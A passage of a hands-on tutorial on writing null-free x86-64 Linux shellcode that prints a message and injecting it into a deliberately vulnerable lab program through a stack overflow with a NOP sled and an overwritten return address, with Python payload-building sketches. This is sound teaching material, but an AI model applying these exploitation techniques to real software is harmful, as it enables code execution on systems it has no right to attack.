35 | The first step is to start with assembly code and write a bare minimum program that will accomplish the task we want. Usually shellcode will simply set up for a system call and then make that system call to perform the task. In our case that task is to print out a message. I like to refer to this [table](https://www.chromium.org/chromium-os/developer-library/reference/linux-constants/syscalls/) hosted by the Chromium project. Consulting the table, we see that syscall number 1 is the write syscall, along with a handy reference of which registers need to be set: arg0 (rdi) is the file descriptor, which in our case will be stdout, arg1 (rsi) is a pointer to the first char in the string to print, and arg2 (rdx) is the number of chars we want to print.
36 |
37 | Here are the steps we'll need to take to write this basic program:
38 |
39 | 1. Push the string we want to print onto the stack in reverse order (we need everything to be self-contained, so we can't use a data section in our assembly)
40 | 2. Set RAX to the syscall number, which for write is 1
41 | 3. Set RDI to the file descriptor number for stdout, which is also 1
42 | 4. Set RSI to point to the start of the string, which for us conveniently starts at the stack pointer
43 | 5. Set RDX to the length of the string to print (which is 8)
44 |
45 | If you want to see my code for this, check out print_shellcode.s.
46 |
47 | After writing the assembly, the next step is to assemble and link it, then run the resulting binary to make sure it works.
48 |
49 | I've included a Makefile to make the process easier.
50 |
51 | ```bash
52 | make print_shellcode
53 | ```
54 | We can now run it and make sure that it does what we want it to do (print out our string).
55 |
56 | ```bash
57 | ./print_shellcode
58 | ```
59 |
60 | If yours worked properly you should see it print out TCMRULEZ and then crash with a seg fault. This is because we don't have a proper epilogue or exit in the program, but don't worry, that's okay, because we just want to strip the raw shellcode out of this.
61 |
62 | ## Step 4 - Extracting the Shellcode
63 |
64 | Inside our binary is the shellcode that we want to extract, and there are a few ways to do this. First let's take a look at the contents of our binary with objdump:
65 |
66 | ```bash
67 | objdump -M intel -d print_shellcode
68 | ```
69 | In the middle column we see the raw machine code for the binary, and the right column shows the assembly. Each line represents one instruction, and the raw machine code on each line is that instruction's encoding (loosely, its opcode). At this point we could manually pull out the machine code, but there is a better way to automate this.
70 |
71 | To start we'll use xxd to print out the raw hex with:
72 |
73 | ```bash
74 | xxd -p print_shellcode
75 | ```
76 |
77 | Now we have the raw hex for the entire binary, but we only need the hex for the machine code. I find it easiest to take note of the first few and last few hex characters in the objdump output and then use them to locate the machine code in the xxd output. I suggest using grep for this.
78 |
79 | ```bash
80 | xxd -p print_shellcode | grep -A2 48b954
81 | ```
82 | Now you can easily copy all of the machine code, from the first character all the way to the last. If you're ending on a syscall in x64 Linux then the opcode for that is 0f05, so those will always be the last two bytes (four hex characters).
83 |
84 | Your raw hexcode should be: "48b954434d52554c455a5148c7c00100000048c7c7010000004889e64831d248c7c2080000000f05"
85 |
86 |
87 |
88 | ## Step 5 - Testing the Shellcode
89 |
90 | The next step I like to do is test the shellcode and make sure that it will work before going to the trouble of crafting an exploit. I've included a simple C program that closely mimics what happens in a stack overflow so that we can attempt to execute raw shellcode and make sure it works properly.
91 |
92 | In order to use the shellcode we'll need it as what's called a hexadecimal escape sequence, where each byte (pair of hex characters) is prefixed with \x.
93 |
94 | You can do this manually, but I don't have time for that, so I've included a basic Python script that can do it as well.
95 |
96 | ```bash
97 | python3 shellcode_formatter.py 48b954434d52554c455a5148c7c00100000048c7c7010000004889e64831d248c7c2080000000f05
98 | ```
99 | This will spit out the format we need. Now we can copy this over to the test_shell.c code and paste it in.
100 |
101 | Now we can compile this test and run it. The compilation command is included as a comment in the file.
102 |
103 | ```bash
104 | gcc -o test_shell test_shell.c
105 | ```
106 | Now run it with:
107 |
108 | ```bash
109 | ./test_shell
110 | ```
111 | We see the output is the same as when we ran the binary, which means our shellcode is working. However, I've added an extra check that shows the length of the shellcode. The C code has detected that the shellcode is 15 bytes long, but our shellcode is much longer (40 bytes).
112 |
113 | ## Step 6 - Removing Bad Characters
114 |
115 | If you count through the raw shellcode 15 bytes, you'll notice that the 16th byte is \x00. In C, 0x00 is used as a null terminator to represent the end of a string. Since most stack overflows in C result from working with strings, a null terminator in our shellcode will prevent the entire shellcode from being copied onto the stack. This is what's referred to as a bad character. Depending on the program there can be multiple bad characters: recall that the program initially processes our shellcode as data, most likely as ASCII characters, and it may filter out certain characters.
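
To see where a C string function would stop, here is a minimal Python sketch that mimics `strlen` on the raw shellcode from Step 4. It is not one of the scripts in this repo, and the helper name `c_strlen` is made up for illustration.

```python
# Raw shellcode extracted in Step 4, as a hex string.
SHELLCODE_HEX = (
    "48b954434d52554c455a5148c7c00100000048c7c7010000004889e64831d248c7c2080000000f05"
)


def c_strlen(data: bytes) -> int:
    """Hypothetical helper: count bytes up to the first 0x00, like C's strlen."""
    end = data.find(b"\x00")
    return len(data) if end == -1 else end


shellcode = bytes.fromhex(SHELLCODE_HEX)
print(f"actual length: {len(shellcode)} bytes")
print(f"length seen by strlen: {c_strlen(shellcode)} bytes")
```

Whenever the second number is smaller than the first, everything after that offset would be dropped by a string copy.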
116 |
117 | In order to avoid this we need to rewrite our shellcode to avoid these bad characters. In our example that just means avoiding any null bytes.
118 |
119 | If you run objdump again and look at the machine code for each instruction, you can see the offending instructions.
120 |
121 |     mov rax, 0x1
122 |     mov rdi, 0x1
123 |     mov rdx, 0x8
124 |
125 | All of these instructions have 00 bytes in their machine code. This is because when we move a small integer into a full register, the value is encoded as a 32-bit immediate, so 1 is stored as 0x00000001. We can easily get around this though.
126 |
127 | Instead of moving into the full register, we can move into the low byte only. For example:
128 |
129 |     mov al, 1
130 |
131 | When we move into al directly, there is no guarantee about the state of the rest of the bytes of the register, but we need them all to be 0. We know we can't use a literal 0 in our assembly as this will result in a bad character. Luckily we can use xor, as xoring anything with itself results in 0.
132 |
133 |     xor rax, rax
134 |     mov al, 1
135 |
136 | This is the equivalent of mov rax, 0x1 but without any bad characters. Now we can modify our shellcode using that same strategy for all offending instructions.
137 |
138 | I've included my solution in print_shellcode_rm_bad_chars.s.
139 |
140 | Now we can repeat the exact same steps we did before to extract the raw shellcode.
141 |
142 | First, if you run objdump on it you'll notice we have no 00 bytes in the machine code.
143 |
144 | After extracting the shellcode, placing it into the tester C code, compiling and running it, you'll notice we now have a length of 29 bytes, which if you count it out is the correct amount. We're now ready to put this into an exploit and run it.
145 |
146 | ## Step 7 - Crafting an Exploit
147 |
148 | Now that we have our shellcode working properly, we need to craft an exploit that packages it up as input to the overflowme program, which we've identified as vulnerable to a stack overflow.
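
Before packaging the shellcode, a quick scan for bad characters can save a debugging session. The sketch below is an illustration only: `find_bad_chars` is a hypothetical helper, and the hex string is what print_shellcode_rm_bad_chars.s should assemble to with GNU as on x86-64, so compare it against your own objdump output before relying on it.

```python
# Assumed bytes for print_shellcode_rm_bad_chars.s; verify against your objdump output.
CLEAN_SHELLCODE_HEX = "48b954434d52554c455a514831c0b0014889c74889e64831d2b2080f05"


def find_bad_chars(data: bytes, bad_chars: bytes = b"\x00") -> list[tuple[int, int]]:
    """Hypothetical helper: return (offset, byte value) for every bad byte in data."""
    return [(offset, value) for offset, value in enumerate(data) if value in bad_chars]


shellcode = bytes.fromhex(CLEAN_SHELLCODE_HEX)
hits = find_bad_chars(shellcode)
print(f"{len(shellcode)} bytes, {len(hits)} bad characters")
for offset, value in hits:
    print(f"  offset {offset}: 0x{value:02x}")
```

If a target also chokes on other bytes (a newline, say), pass them in as well, for example `find_bad_chars(shellcode, b"\x00\x0a")`.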
149 |
150 | Similar to the previous level, we'll need to fill up the stack and overwrite the return address with an address we control. This time though, instead of filling the stack completely with "A"s, we'll need to insert our shellcode and then find the start of that shellcode on the stack so we can set the return address to that address and jump to it.
151 |
152 | Let's start by simply running the program as intended in GDB:
153 |
154 | ```bash
155 | gdb ./overflowme
156 | ```
157 |
158 | Then, let's set up one breakpoint to catch the code before it returns from the function call:
159 |
160 | `b before_function_return`
161 |
162 | Now we can run the program with `r` and it should automatically stop when we are prompted for input. Put anything here you'd like, there is no need to overflow it. Next continue with `c` and you should now be halted at the breakpoint before the function returns.
163 |
164 | Now let's take a look at the stack layout with:
165 |
166 | `x/66xg $rsp`
167 |
168 | This displays 66 quad-words in hex format starting from the stack pointer upwards. Now we can get an idea of where the stack is. For me, 0x7fffffffda20 is pretty close to the middle of it, so we can start with this as our return address.
169 |
170 | Now that we have an idea of where we want to land, let's start crafting our exploit.
171 |
172 | Previously we just filled the stack with "A"s all the way through the saved base pointer and then placed our return address at the end. This time we need our shellcode on the stack. For our shellcode to work properly we need to land exactly at the start of it, which creates something of a needle in a haystack scenario. To get around this we'll employ what's called a NOP sled. NOP stands for No Operation and tells the processor to do nothing and move on to the next instruction. If we place NOPs before our shellcode, then as long as we land somewhere in the NOPs, execution will continue on doing "nothing" until it hits the first instruction of our shellcode.
173 |
174 | We'll still want some padding between our shellcode and the return address though, so that the shellcode doesn't get peeled away by the function epilogue when it pops off what should be the preserved caller's base pointer. Because of that we'll want our exploit to look something like:
175 |
176 | NOPs + Shellcode + Padding + Return Address
177 |
178 | Recall that we need 520 bytes (the 512-byte buffer plus 8 bytes for the saved base pointer) to fill up the stack before the return address is overwritten.
179 |
180 | We can work backwards from this as we know the length of our shellcode and the return address. I usually start with a padding size that's roughly 1/4 of the whole string. I went with 128 bytes, which means the remaining bytes can all be NOPs.
181 |
182 | Let's create our exploit string now:
183 |
184 | ```bash
185 | python3 exploit.py > exploit
186 | ```
187 |
188 | Now let's head back over to gdb and run through this with the exploit passed in.
189 |
190 | ```bash
191 | gdb ./overflowme
192 | ```
193 |
194 | Again set up a breakpoint to catch the code before it returns from the function call:
195 |
196 | `b before_function_return`
197 |
198 | Now run it and pass the exploit in on stdin:
199 |
200 | `r < exploit`
201 |
202 | Once it hits the breakpoint, let's re-examine the layout of the stack with:
203 |
204 | `x/66xg $rsp`
205 |
206 | You should see the return address we added at the bottom of the stack, then moving up the stack the padding, which is all "A"s (0x41 in ASCII), then the shellcode, and finally the NOP sled (0x90 is NOP on x86-64). If we've got everything right, the return address we added should point to somewhere in the NOP sled.
207 |
208 |
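
The NOPs + Shellcode + Padding + Return Address layout can be sketched in Python as follows. This is an illustrative sketch, not necessarily what the repo's exploit.py does: the shellcode bytes are what print_shellcode_rm_bad_chars.s should assemble to, the return address is the value from my GDB session and will almost certainly differ on your machine, and writing only the low 6 bytes of the address follows the level 1 exploit.

```python
import struct
import sys

FILL_LENGTH = 520      # 512-byte buffer + 8 bytes for the saved RBP
PADDING_LENGTH = 128   # "A" padding between the shellcode and the return address
RETURN_ADDRESS = 0x7FFFFFFFDA20  # assumption: from one GDB session, adjust for yours

# Assumed bytes for print_shellcode_rm_bad_chars.s; verify against your objdump output.
SHELLCODE = bytes.fromhex("48b954434d52554c455a514831c0b0014889c74889e64831d2b2080f05")


def build_payload(return_address: int = RETURN_ADDRESS) -> bytes:
    """Assemble NOP sled + shellcode + padding + return address."""
    nop_count = FILL_LENGTH - len(SHELLCODE) - PADDING_LENGTH
    nop_sled = b"\x90" * nop_count
    padding = b"\x41" * PADDING_LENGTH
    # Little-endian address; keep the low 6 bytes, as the level 1 exploit does.
    address = struct.pack("<Q", return_address)[:6]
    return nop_sled + SHELLCODE + padding + address


if __name__ == "__main__":
    sys.stdout.buffer.write(build_payload())
```

With a 29-byte shellcode and 128 bytes of padding, that leaves 363 bytes for the NOP sled, which gives a comfortably large landing zone if your stack addresses shift a little between runs.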
209 |
215 |